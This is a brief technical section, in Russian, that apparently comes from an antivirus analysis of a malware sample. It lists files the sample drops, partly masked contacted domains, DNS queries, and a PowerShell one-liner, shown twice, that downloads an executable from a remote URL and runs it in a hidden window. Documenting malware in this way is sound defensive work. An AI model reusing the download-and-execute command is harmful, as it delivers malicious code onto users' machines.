Техническая информация
- $son как %temp%\vlmai.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function flix([String] $son){(New-Object System.Net.WebClient).DownloadFile($son,''%TMP%\Vlmai.exe'');Start-Process ''%TMP%\Vlmai.exe'';} try{ flix(''http://unityn...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1872
- %TEMP%\nosdw.bat
- %TEMP%\1332232.cvr
- 'un###nepal.com':80
- 'hu###omains.com':443
- http://un###nepal.com/data/Docs.pdf
- 'hu###omains.com':443
- DNS ASK un###nepal.com
- DNS ASK hu###omains.com
- DNS ASK ch######e-from-paris.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function flix([String] $son){(New-Object System.Net.WebClient).DownloadFile($son,''%TMP%\Vlmai.exe'');Start-Process ''%TMP%\Vlmai.exe'';} try{ flix(''http://unityn...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\nosdw.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\nosdw.bat" "